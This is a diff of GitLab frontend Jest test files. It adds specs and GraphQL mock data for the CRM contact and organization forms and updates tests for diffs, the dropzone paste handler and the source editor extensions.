{ + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(createContactMutationErrorResponse); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Phone is invalid.'); + }); + }); + + describe('when update mutation is successful', () => { + it("should emit 'close'", async () => { + mutation = updateContactMutation; + queryHandler = jest.fn().mockResolvedValue(updateContactMutationResponse); + mountComponent({ editForm: true }); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when update mutation fails', () => { + beforeEach(() => { + mutation = updateContactMutation; + }); + + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent({ editForm: true }); + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(updateContactMutationErrorResponse); + mountComponent({ editForm: true }); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Email is invalid.'); + }); + }); +}); diff --git a/spec/frontend/crm/contacts_root_spec.js b/spec/frontend/crm/contacts_root_spec.js index 79b85969eb4..b30349305a3 100644 --- a/spec/frontend/crm/contacts_root_spec.js +++ b/spec/frontend/crm/contacts_root_spec.js @@ -1,39 +1,65 @@ -import { GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlLoadingIcon 
} from '@gitlab/ui'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; +import VueRouter from 'vue-router'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; import ContactsRoot from '~/crm/components/contacts_root.vue'; +import ContactForm from '~/crm/components/contact_form.vue'; import getGroupContactsQuery from '~/crm/components/queries/get_group_contacts.query.graphql'; +import { NEW_ROUTE_NAME, EDIT_ROUTE_NAME } from '~/crm/constants'; +import routes from '~/crm/routes'; import { getGroupContactsQueryResponse } from './mock_data'; -jest.mock('~/flash'); - describe('Customer relations contacts root app', () => { Vue.use(VueApollo); + Vue.use(VueRouter); let wrapper; let fakeApollo; + let router; const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); const findRowByName = (rowName) => wrapper.findAllByRole('row', { name: rowName }); + const findIssuesLinks = () => wrapper.findAllByTestId('issues-link'); + const findNewContactButton = () => wrapper.findByTestId('new-contact-button'); + const findEditContactButton = () => wrapper.findByTestId('edit-contact-button'); + const findContactForm = () => wrapper.findComponent(ContactForm); + const findError = () => wrapper.findComponent(GlAlert); const successQueryHandler = jest.fn().mockResolvedValue(getGroupContactsQueryResponse); + const basePath = '/groups/flightjs/-/crm/contacts'; + const mountComponent = ({ queryHandler = successQueryHandler, mountFunction = shallowMountExtended, + canAdminCrmContact = true, } = {}) => { fakeApollo = createMockApollo([[getGroupContactsQuery, queryHandler]]); wrapper = mountFunction(ContactsRoot, { - provide: { groupFullPath: 'flightjs' }, + router, + provide: { + groupFullPath: 'flightjs', + groupIssuesPath: '/issues', + groupId: 26, + canAdminCrmContact, + }, apolloProvider: 
fakeApollo, }); }; + beforeEach(() => { + router = new VueRouter({ + base: basePath, + mode: 'history', + routes, + }); + }); + afterEach(() => { wrapper.destroy(); fakeApollo = null; + router = null; }); it('should render loading spinner', () => { @@ -42,19 +68,113 @@ describe('Customer relations contacts root app', () => { expect(findLoadingIcon().exists()).toBe(true); }); - it('should render error message on reject', async () => { - mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); - await waitForPromises(); + describe('new contact button', () => { + it('should exist when user has permission', () => { + mountComponent(); + + expect(findNewContactButton().exists()).toBe(true); + }); + + it('should not exist when user has no permission', () => { + mountComponent({ canAdminCrmContact: false }); + + expect(findNewContactButton().exists()).toBe(false); + }); + }); + + describe('contact form', () => { + it('should not exist by default', async () => { + mountComponent(); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + + it('should exist when user clicks new contact button', async () => { + mountComponent(); + + findNewContactButton().vm.$emit('click'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to `new` route', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user clicks edit contact button', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); + + findEditContactButton().vm.$emit('click'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to `edit` route', async () => { + router.replace({ name: EDIT_ROUTE_NAME, params: { id: 16 } }); + mountComponent(); + await 
waitForPromises(); + + expect(findContactForm().exists()).toBe(true); + }); + + it('should not exist when new form emits close', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + + findContactForm().vm.$emit('close'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + + it('should not exist when edit form emits close', async () => { + router.replace({ name: EDIT_ROUTE_NAME, params: { id: 16 } }); + mountComponent(); + await waitForPromises(); + + findContactForm().vm.$emit('close'); + await waitForPromises(); + + expect(findContactForm().exists()).toBe(false); + }); + }); + + describe('error', () => { + it('should exist on reject', async () => { + mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); + await waitForPromises(); - expect(createFlash).toHaveBeenCalled(); + expect(findError().exists()).toBe(true); + }); }); - it('renders correct results', async () => { - mountComponent({ mountFunction: mountExtended }); - await waitForPromises(); + describe('on successful load', () => { + it('should not render error', async () => { + mountComponent(); + await waitForPromises(); - expect(findRowByName(/Marty/i)).toHaveLength(1); - expect(findRowByName(/George/i)).toHaveLength(1); - expect(findRowByName(/jd@gitlab.com/i)).toHaveLength(1); + expect(findError().exists()).toBe(false); + }); + + it('renders correct results', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); + + expect(findRowByName(/Marty/i)).toHaveLength(1); + expect(findRowByName(/George/i)).toHaveLength(1); + expect(findRowByName(/jd@gitlab.com/i)).toHaveLength(1); + + const issueLink = findIssuesLinks().at(0); + expect(issueLink.exists()).toBe(true); + expect(issueLink.attributes('href')).toBe('/issues?scope=all&state=opened&crm_contact_id=16'); + }); }); }); diff --git a/spec/frontend/crm/mock_data.js b/spec/frontend/crm/mock_data.js index 4197621aaa6..f7af2ccdb72 100644 --- 
a/spec/frontend/crm/mock_data.js +++ b/spec/frontend/crm/mock_data.js @@ -40,7 +40,6 @@ export const getGroupContactsQueryResponse = { organization: null, }, ], - __typename: 'CustomerRelationsContactConnection', }, }, }, @@ -79,3 +78,84 @@ export const getGroupOrganizationsQueryResponse = { }, }, }; + +export const createContactMutationResponse = { + data: { + customerRelationsContactCreate: { + __typeName: 'CustomerRelationsContactCreatePayload', + contact: { + __typename: 'CustomerRelationsContact', + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'A', + lastName: 'B', + email: 'C', + phone: null, + description: null, + organization: null, + }, + errors: [], + }, + }, +}; + +export const createContactMutationErrorResponse = { + data: { + customerRelationsContactCreate: { + contact: null, + errors: ['Phone is invalid.'], + }, + }, +}; + +export const updateContactMutationResponse = { + data: { + customerRelationsContactUpdate: { + __typeName: 'CustomerRelationsContactCreatePayload', + contact: { + __typename: 'CustomerRelationsContact', + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'First', + lastName: 'Last', + email: 'email@example.com', + phone: null, + description: null, + organization: null, + }, + errors: [], + }, + }, +}; + +export const updateContactMutationErrorResponse = { + data: { + customerRelationsContactUpdate: { + contact: null, + errors: ['Email is invalid.'], + }, + }, +}; + +export const createOrganizationMutationResponse = { + data: { + customerRelationsOrganizationCreate: { + __typeName: 'CustomerRelationsOrganizationCreatePayload', + organization: { + __typename: 'CustomerRelationsOrganization', + id: 'gid://gitlab/CustomerRelations::Organization/2', + name: 'A', + defaultRate: null, + description: null, + }, + errors: [], + }, + }, +}; + +export const createOrganizationMutationErrorResponse = { + data: { + customerRelationsOrganizationCreate: { + organization: null, + errors: ['Name cannot be blank.'], + }, 
+ }, +}; diff --git a/spec/frontend/crm/new_organization_form_spec.js b/spec/frontend/crm/new_organization_form_spec.js new file mode 100644 index 00000000000..976b626f35f --- /dev/null +++ b/spec/frontend/crm/new_organization_form_spec.js @@ -0,0 +1,109 @@ +import { GlAlert } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import NewOrganizationForm from '~/crm/components/new_organization_form.vue'; +import createOrganizationMutation from '~/crm/components/queries/create_organization.mutation.graphql'; +import getGroupOrganizationsQuery from '~/crm/components/queries/get_group_organizations.query.graphql'; +import { + createOrganizationMutationErrorResponse, + createOrganizationMutationResponse, + getGroupOrganizationsQueryResponse, +} from './mock_data'; + +describe('Customer relations organizations root app', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + let queryHandler; + + const findCreateNewOrganizationButton = () => + wrapper.findByTestId('create-new-organization-button'); + const findCancelButton = () => wrapper.findByTestId('cancel-button'); + const findForm = () => wrapper.find('form'); + const findError = () => wrapper.findComponent(GlAlert); + + const mountComponent = () => { + fakeApollo = createMockApollo([[createOrganizationMutation, queryHandler]]); + fakeApollo.clients.defaultClient.cache.writeQuery({ + query: getGroupOrganizationsQuery, + variables: { groupFullPath: 'flightjs' }, + data: getGroupOrganizationsQueryResponse.data, + }); + wrapper = shallowMountExtended(NewOrganizationForm, { + provide: { groupId: 26, groupFullPath: 'flightjs' }, + apolloProvider: fakeApollo, + propsData: { drawerOpen: true }, + }); + }; + + beforeEach(() => { + queryHandler = 
jest.fn().mockResolvedValue(createOrganizationMutationResponse); + }); + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + describe('Create new organization button', () => { + it('should be disabled by default', () => { + mountComponent(); + + expect(findCreateNewOrganizationButton().attributes('disabled')).toBeTruthy(); + }); + + it('should not be disabled when first, last and email have values', async () => { + mountComponent(); + + wrapper.find('#organization-name').vm.$emit('input', 'A'); + await waitForPromises(); + + expect(findCreateNewOrganizationButton().attributes('disabled')).toBeFalsy(); + }); + }); + + it("should emit 'close' when cancel button is clicked", () => { + mountComponent(); + + findCancelButton().vm.$emit('click'); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + + describe('when query is successful', () => { + it("should emit 'close'", async () => { + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(wrapper.emitted().close).toBeTruthy(); + }); + }); + + describe('when query fails', () => { + it('should show error on reject', async () => { + queryHandler = jest.fn().mockRejectedValue('ERROR'); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + }); + + it('should show error on error response', async () => { + queryHandler = jest.fn().mockResolvedValue(createOrganizationMutationErrorResponse); + mountComponent(); + + findForm().trigger('submit'); + await waitForPromises(); + + expect(findError().exists()).toBe(true); + expect(findError().text()).toBe('Name cannot be blank.'); + }); + }); +}); diff --git a/spec/frontend/crm/organizations_root_spec.js b/spec/frontend/crm/organizations_root_spec.js index a69a099e03d..aef417964f4 100644 --- a/spec/frontend/crm/organizations_root_spec.js +++ b/spec/frontend/crm/organizations_root_spec.js @@ -1,39 +1,59 @@ -import { GlLoadingIcon } from '@gitlab/ui'; 
+import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; +import VueRouter from 'vue-router'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; import OrganizationsRoot from '~/crm/components/organizations_root.vue'; +import NewOrganizationForm from '~/crm/components/new_organization_form.vue'; +import { NEW_ROUTE_NAME } from '~/crm/constants'; +import routes from '~/crm/routes'; import getGroupOrganizationsQuery from '~/crm/components/queries/get_group_organizations.query.graphql'; import { getGroupOrganizationsQueryResponse } from './mock_data'; -jest.mock('~/flash'); - describe('Customer relations organizations root app', () => { Vue.use(VueApollo); + Vue.use(VueRouter); let wrapper; let fakeApollo; + let router; const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); const findRowByName = (rowName) => wrapper.findAllByRole('row', { name: rowName }); + const findIssuesLinks = () => wrapper.findAllByTestId('issues-link'); + const findNewOrganizationButton = () => wrapper.findByTestId('new-organization-button'); + const findNewOrganizationForm = () => wrapper.findComponent(NewOrganizationForm); + const findError = () => wrapper.findComponent(GlAlert); const successQueryHandler = jest.fn().mockResolvedValue(getGroupOrganizationsQueryResponse); + const basePath = '/groups/flightjs/-/crm/organizations'; + const mountComponent = ({ queryHandler = successQueryHandler, mountFunction = shallowMountExtended, + canAdminCrmOrganization = true, } = {}) => { fakeApollo = createMockApollo([[getGroupOrganizationsQuery, queryHandler]]); wrapper = mountFunction(OrganizationsRoot, { - provide: { groupFullPath: 'flightjs' }, + router, + provide: { canAdminCrmOrganization, groupFullPath: 'flightjs', groupIssuesPath: '/issues' }, 
apolloProvider: fakeApollo, }); }; + beforeEach(() => { + router = new VueRouter({ + base: basePath, + mode: 'history', + routes, + }); + }); + afterEach(() => { wrapper.destroy(); fakeApollo = null; + router = null; }); it('should render loading spinner', () => { @@ -42,19 +62,84 @@ describe('Customer relations organizations root app', () => { expect(findLoadingIcon().exists()).toBe(true); }); + describe('new organization button', () => { + it('should exist when user has permission', () => { + mountComponent(); + + expect(findNewOrganizationButton().exists()).toBe(true); + }); + + it('should not exist when user has no permission', () => { + mountComponent({ canAdminCrmOrganization: false }); + + expect(findNewOrganizationButton().exists()).toBe(false); + }); + }); + + describe('new organization form', () => { + it('should not exist by default', async () => { + mountComponent(); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(false); + }); + + it('should exist when user clicks new contact button', async () => { + mountComponent(); + + findNewOrganizationButton().vm.$emit('click'); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(true); + }); + + it('should exist when user navigates directly to /new', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(true); + }); + + it('should not exist when form emits close', async () => { + router.replace({ name: NEW_ROUTE_NAME }); + mountComponent(); + + findNewOrganizationForm().vm.$emit('close'); + await waitForPromises(); + + expect(findNewOrganizationForm().exists()).toBe(false); + }); + }); + it('should render error message on reject', async () => { mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); await waitForPromises(); - expect(createFlash).toHaveBeenCalled(); + expect(findError().exists()).toBe(true); }); - it('renders correct 
results', async () => { - mountComponent({ mountFunction: mountExtended }); - await waitForPromises(); + describe('on successful load', () => { + it('should not render error', async () => { + mountComponent(); + await waitForPromises(); + + expect(findError().exists()).toBe(false); + }); + + it('renders correct results', async () => { + mountComponent({ mountFunction: mountExtended }); + await waitForPromises(); - expect(findRowByName(/Test Inc/i)).toHaveLength(1); - expect(findRowByName(/VIP/i)).toHaveLength(1); - expect(findRowByName(/120/i)).toHaveLength(1); + expect(findRowByName(/Test Inc/i)).toHaveLength(1); + expect(findRowByName(/VIP/i)).toHaveLength(1); + expect(findRowByName(/120/i)).toHaveLength(1); + + const issueLink = findIssuesLinks().at(0); + expect(issueLink.exists()).toBe(true); + expect(issueLink.attributes('href')).toBe( + '/issues?scope=all&state=opened&crm_organization_id=2', + ); + }); }); }); diff --git a/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap b/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap deleted file mode 100644 index ed8ed3254ba..00000000000 --- a/spec/frontend/design_management/components/__snapshots__/design_note_pin_spec.js.snap +++ /dev/null @@ -1,28 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`Design note pin component should match the snapshot of note with index 1`] = ` -<button - aria-label="Comment '1' position" - class="gl-absolute gl-display-flex gl-align-items-center gl-justify-content-center gl-font-lg gl-outline-0! js-image-badge badge badge-pill" - style="left: 10px; top: 10px;" - type="button" -> - - 1 - -</button> -`; - -exports[`Design note pin component should match the snapshot of note without index 1`] = ` -<button - aria-label="Comment form position" - class="gl-absolute gl-display-flex gl-align-items-center gl-justify-content-center gl-font-lg gl-outline-0! 
btn-transparent comment-indicator gl-p-0" - style="left: 10px; top: 10px;" - type="button" -> - <gl-icon-stub - name="image-comment-dark" - size="24" - /> -</button> -`; diff --git a/spec/frontend/design_management/mock_data/apollo_mock.js b/spec/frontend/design_management/mock_data/apollo_mock.js index cdd07a16e90..2a43b5debee 100644 --- a/spec/frontend/design_management/mock_data/apollo_mock.js +++ b/spec/frontend/design_management/mock_data/apollo_mock.js @@ -5,6 +5,7 @@ export const designListQueryResponse = { id: '1', issue: { __typename: 'Issue', + id: 'issue-1', designCollection: { __typename: 'DesignCollection', copyState: 'READY', @@ -97,6 +98,7 @@ export const permissionsQueryResponse = { id: '1', issue: { __typename: 'Issue', + id: 'issue-1', userPermissions: { __typename: 'UserPermissions', createDesign: true }, }, }, diff --git a/spec/frontend/diffs/components/diff_discussions_spec.js b/spec/frontend/diffs/components/diff_discussions_spec.js index c847a79435a..bd6f4cd2545 100644 --- a/spec/frontend/diffs/components/diff_discussions_spec.js +++ b/spec/frontend/diffs/components/diff_discussions_spec.js @@ -1,7 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { mount, createLocalVue } from '@vue/test-utils'; import DiffDiscussions from '~/diffs/components/diff_discussions.vue'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import { createStore } from '~/mr_notes/stores'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import NoteableDiscussion from '~/notes/components/noteable_discussion.vue'; @@ -20,9 +19,6 @@ describe('DiffDiscussions', () => { store = createStore(); wrapper = mount(localVue.extend(DiffDiscussions), { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussions: getDiscussionsMockData(), ...props, diff --git a/spec/frontend/diffs/components/diff_file_spec.js 
b/spec/frontend/diffs/components/diff_file_spec.js index feb7118744b..dc0ed621a64 100644 --- a/spec/frontend/diffs/components/diff_file_spec.js +++ b/spec/frontend/diffs/components/diff_file_spec.js @@ -3,7 +3,7 @@ import MockAdapter from 'axios-mock-adapter'; import { nextTick } from 'vue'; import Vuex from 'vuex'; -import DiffContentComponent from '~/diffs/components/diff_content.vue'; +import DiffContentComponent from 'jh_else_ce/diffs/components/diff_content.vue'; import DiffFileComponent from '~/diffs/components/diff_file.vue'; import DiffFileHeaderComponent from '~/diffs/components/diff_file_header.vue'; diff --git a/spec/frontend/diffs/components/diff_row_spec.js b/spec/frontend/diffs/components/diff_row_spec.js index c0c92908701..4c5ce429c9d 100644 --- a/spec/frontend/diffs/components/diff_row_spec.js +++ b/spec/frontend/diffs/components/diff_row_spec.js @@ -277,3 +277,36 @@ describe('DiffRow', () => { }); }); }); + +describe('coverage state memoization', () => { + it('updates when coverage is loaded', () => { + const lineWithoutCoverage = {}; + const lineWithCoverage = { + text: 'Test coverage: 5 hits', + class: 'coverage', + }; + + const unchangedProps = { + inline: true, + filePath: 'file/path', + line: { left: { new_line: 3 } }, + }; + + const noCoverageProps = { + fileLineCoverage: () => lineWithoutCoverage, + coverageLoaded: false, + ...unchangedProps, + }; + const coverageProps = { + fileLineCoverage: () => lineWithCoverage, + coverageLoaded: true, + ...unchangedProps, + }; + + // this caches no coverage for the line + expect(DiffRow.coverageStateLeft(noCoverageProps)).toStrictEqual(lineWithoutCoverage); + + // this retrieves coverage for the line because it has been recached + expect(DiffRow.coverageStateLeft(coverageProps)).toStrictEqual(lineWithCoverage); + }); +}); diff --git a/spec/frontend/diffs/store/mutations_spec.js b/spec/frontend/diffs/store/mutations_spec.js index c104fcd5fb9..d8611b1ce1b 100644 --- 
a/spec/frontend/diffs/store/mutations_spec.js +++ b/spec/frontend/diffs/store/mutations_spec.js @@ -112,6 +112,7 @@ describe('DiffsStoreMutations', () => { mutations[types.SET_COVERAGE_DATA](state, coverage); expect(state.coverageFiles).toEqual(coverage); + expect(state.coverageLoaded).toEqual(true); }); }); diff --git a/spec/frontend/diffs/utils/discussions_spec.js b/spec/frontend/diffs/utils/discussions_spec.js deleted file mode 100644 index 9a3d442d943..00000000000 --- a/spec/frontend/diffs/utils/discussions_spec.js +++ /dev/null @@ -1,133 +0,0 @@ -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; - -describe('Diff Discussions Utils', () => { - describe('discussionIntersectionObserverHandlerFactory', () => { - it('creates a handler function', () => { - expect(discussionIntersectionObserverHandlerFactory()).toBeInstanceOf(Function); - }); - - describe('intersection observer handler', () => { - const functions = { - setCurrentDiscussionId: jest.fn(), - getPreviousUnresolvedDiscussionId: jest.fn().mockImplementation((id) => { - return Number(id) - 1; - }), - }; - const defaultProcessableWrapper = { - entry: { - time: 0, - isIntersecting: true, - rootBounds: { - bottom: 0, - }, - boundingClientRect: { - top: 0, - }, - }, - currentDiscussion: { - id: 1, - }, - isFirstUnresolved: false, - isDiffsPage: true, - }; - let handler; - let getMock; - let setMock; - - beforeEach(() => { - functions.setCurrentDiscussionId.mockClear(); - functions.getPreviousUnresolvedDiscussionId.mockClear(); - - defaultProcessableWrapper.functions = functions; - - setMock = functions.setCurrentDiscussionId.mock; - getMock = functions.getPreviousUnresolvedDiscussionId.mock; - handler = discussionIntersectionObserverHandlerFactory(); - }); - - it('debounces multiple simultaneous requests into one queue', () => { - handler(defaultProcessableWrapper); - handler(defaultProcessableWrapper); - handler(defaultProcessableWrapper); - 
handler(defaultProcessableWrapper); - - expect(setTimeout).toHaveBeenCalledTimes(4); - expect(clearTimeout).toHaveBeenCalledTimes(3); - - // By only advancing to one timer, we ensure it's all being batched into one queue - jest.advanceTimersToNextTimer(); - - expect(functions.setCurrentDiscussionId).toHaveBeenCalledTimes(4); - }); - - it('properly processes, sorts and executes the correct actions for a set of observed intersections', () => { - handler(defaultProcessableWrapper); - handler({ - // This observation is here to be filtered out because it's a scrollDown - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - isIntersecting: false, - boundingClientRect: { top: 10 }, - rootBounds: { bottom: 100 }, - }, - }); - handler({ - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - time: 101, - isIntersecting: false, - rootBounds: { bottom: -100 }, - }, - currentDiscussion: { id: 20 }, - }); - handler({ - ...defaultProcessableWrapper, - entry: { - ...defaultProcessableWrapper.entry, - time: 100, - isIntersecting: false, - boundingClientRect: { top: 100 }, - }, - currentDiscussion: { id: 30 }, - isDiffsPage: false, - }); - handler({ - ...defaultProcessableWrapper, - isFirstUnresolved: true, - entry: { - ...defaultProcessableWrapper.entry, - time: 100, - isIntersecting: false, - boundingClientRect: { top: 200 }, - }, - }); - - jest.advanceTimersToNextTimer(); - - expect(setMock.calls.length).toBe(4); - expect(setMock.calls[0]).toEqual([1]); - expect(setMock.calls[1]).toEqual([29]); - expect(setMock.calls[2]).toEqual([null]); - expect(setMock.calls[3]).toEqual([19]); - - expect(getMock.calls.length).toBe(2); - expect(getMock.calls[0]).toEqual([30, false]); - expect(getMock.calls[1]).toEqual([20, true]); - - [ - setMock.invocationCallOrder[0], - getMock.invocationCallOrder[0], - setMock.invocationCallOrder[1], - setMock.invocationCallOrder[2], - getMock.invocationCallOrder[1], - setMock.invocationCallOrder[3], - 
].forEach((order, idx, list) => { - // Compare each invocation sequence to the one before it (except the first one) - expect(list[idx - 1] || -1).toBeLessThan(order); - }); - }); - }); - }); -}); diff --git a/spec/frontend/dropzone_input_spec.js b/spec/frontend/dropzone_input_spec.js index 12e10f7c5f4..11414e8890d 100644 --- a/spec/frontend/dropzone_input_spec.js +++ b/spec/frontend/dropzone_input_spec.js @@ -32,6 +32,8 @@ describe('dropzone_input', () => { }); describe('handlePaste', () => { + let form; + const triggerPasteEvent = (clipboardData = {}) => { const event = $.Event('paste'); const origEvent = new Event('paste'); @@ -45,11 +47,15 @@ describe('dropzone_input', () => { beforeEach(() => { loadFixtures('issues/new-issue.html'); - const form = $('#new_issue'); + form = $('#new_issue'); form.data('uploads-path', TEST_UPLOAD_PATH); dropzoneInput(form); }); + afterEach(() => { + form = null; + }); + it('pastes Markdown tables', () => { jest.spyOn(PasteMarkdownTable.prototype, 'isTable'); jest.spyOn(PasteMarkdownTable.prototype, 'convertToTableMarkdown'); @@ -86,6 +92,27 @@ describe('dropzone_input', () => { expect(axiosMock.history.post[0].data.get('file').name).toHaveLength(246); }); + it('disables generated image file when clipboardData have both image and text', () => { + const TEST_PLAIN_TEXT = 'This wording is a plain text.'; + triggerPasteEvent({ + types: ['text/plain', 'Files'], + getData: () => TEST_PLAIN_TEXT, + items: [ + { + kind: 'text', + type: 'text/plain', + }, + { + kind: 'file', + type: 'image/png', + getAsFile: () => new Blob(), + }, + ], + }); + + expect(form.find('.js-gfm-input')[0].value).toBe(''); + }); + it('display original file name in comment box', async () => { const axiosMock = new MockAdapter(axios); triggerPasteEvent({ diff --git a/spec/frontend/editor/helpers.js b/spec/frontend/editor/helpers.js index 6f7cdf6efb3..252d783ad6d 100644 --- a/spec/frontend/editor/helpers.js +++ b/spec/frontend/editor/helpers.js @@ -1,4 +1,22 @@ 
-export class MyClassExtension { +/* eslint-disable max-classes-per-file */ + +// Helpers +export const spyOnApi = (extension, spiesObj = {}) => { + const origApi = extension.api; + if (extension?.obj) { + jest.spyOn(extension.obj, 'provides').mockReturnValue({ + ...origApi, + ...spiesObj, + }); + } +}; + +// Dummy Extensions +export class SEClassExtension { + static get extensionName() { + return 'SEClassExtension'; + } + // eslint-disable-next-line class-methods-use-this provides() { return { @@ -8,8 +26,9 @@ export class MyClassExtension { } } -export function MyFnExtension() { +export function SEFnExtension() { return { + extensionName: 'SEFnExtension', fnExtMethod: () => 'fn own method', provides: () => { return { @@ -19,8 +38,9 @@ export function MyFnExtension() { }; } -export const MyConstExt = () => { +export const SEConstExt = () => { return { + extensionName: 'SEConstExt', provides: () => { return { constExtMethod: () => 'const own method', @@ -29,9 +49,39 @@ export const MyConstExt = () => { }; }; +export class SEWithSetupExt { + static get extensionName() { + return 'SEWithSetupExt'; + } + // eslint-disable-next-line class-methods-use-this + onSetup(instance, setupOptions = {}) { + if (setupOptions && !Array.isArray(setupOptions)) { + Object.entries(setupOptions).forEach(([key, value]) => { + Object.assign(instance, { + [key]: value, + }); + }); + } + } + provides() { + return { + returnInstanceAndProps: (instance, stringProp, objProp = {}) => { + return [stringProp, objProp, instance]; + }, + returnInstance: (instance) => { + return instance; + }, + giveMeContext: () => { + return this; + }, + }; + } +} + export const conflictingExtensions = { WithInstanceExt: () => { return { + extensionName: 'WithInstanceExt', provides: () => { return { use: () => 'A conflict with instance', @@ -42,6 +92,7 @@ export const conflictingExtensions = { }, WithAnotherExt: () => { return { + extensionName: 'WithAnotherExt', provides: () => { return { shared: () => 'A 
conflict with extension', diff --git a/spec/frontend/editor/source_editor_ci_schema_ext_spec.js b/spec/frontend/editor/source_editor_ci_schema_ext_spec.js index 8a0d1ecf1af..5eaac9e9ef9 100644 --- a/spec/frontend/editor/source_editor_ci_schema_ext_spec.js +++ b/spec/frontend/editor/source_editor_ci_schema_ext_spec.js @@ -23,7 +23,7 @@ describe('~/editor/editor_ci_config_ext', () => { blobPath, blobContent: '', }); - instance.use(new CiSchemaExtension()); + instance.use({ definition: CiSchemaExtension }); }; beforeAll(() => { diff --git a/spec/frontend/editor/source_editor_extension_base_spec.js b/spec/frontend/editor/source_editor_extension_base_spec.js index a0fb1178b3b..6606557fd1f 100644 --- a/spec/frontend/editor/source_editor_extension_base_spec.js +++ b/spec/frontend/editor/source_editor_extension_base_spec.js @@ -2,40 +2,25 @@ import { Range } from 'monaco-editor'; import { useFakeRequestAnimationFrame } from 'helpers/fake_request_animation_frame'; import setWindowLocation from 'helpers/set_window_location_helper'; import { - ERROR_INSTANCE_REQUIRED_FOR_EXTENSION, EDITOR_TYPE_CODE, EDITOR_TYPE_DIFF, + EXTENSION_BASE_LINE_LINK_ANCHOR_CLASS, + EXTENSION_BASE_LINE_NUMBERS_CLASS, } from '~/editor/constants'; import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; - -jest.mock('~/helpers/startup_css_helper', () => { - return { - waitForCSSLoaded: jest.fn().mockImplementation((cb) => { - // We have to artificially put the callback's execution - // to the end of the current call stack to be able to - // test that the callback is called after waitForCSSLoaded. - // setTimeout with 0 delay does exactly that. 
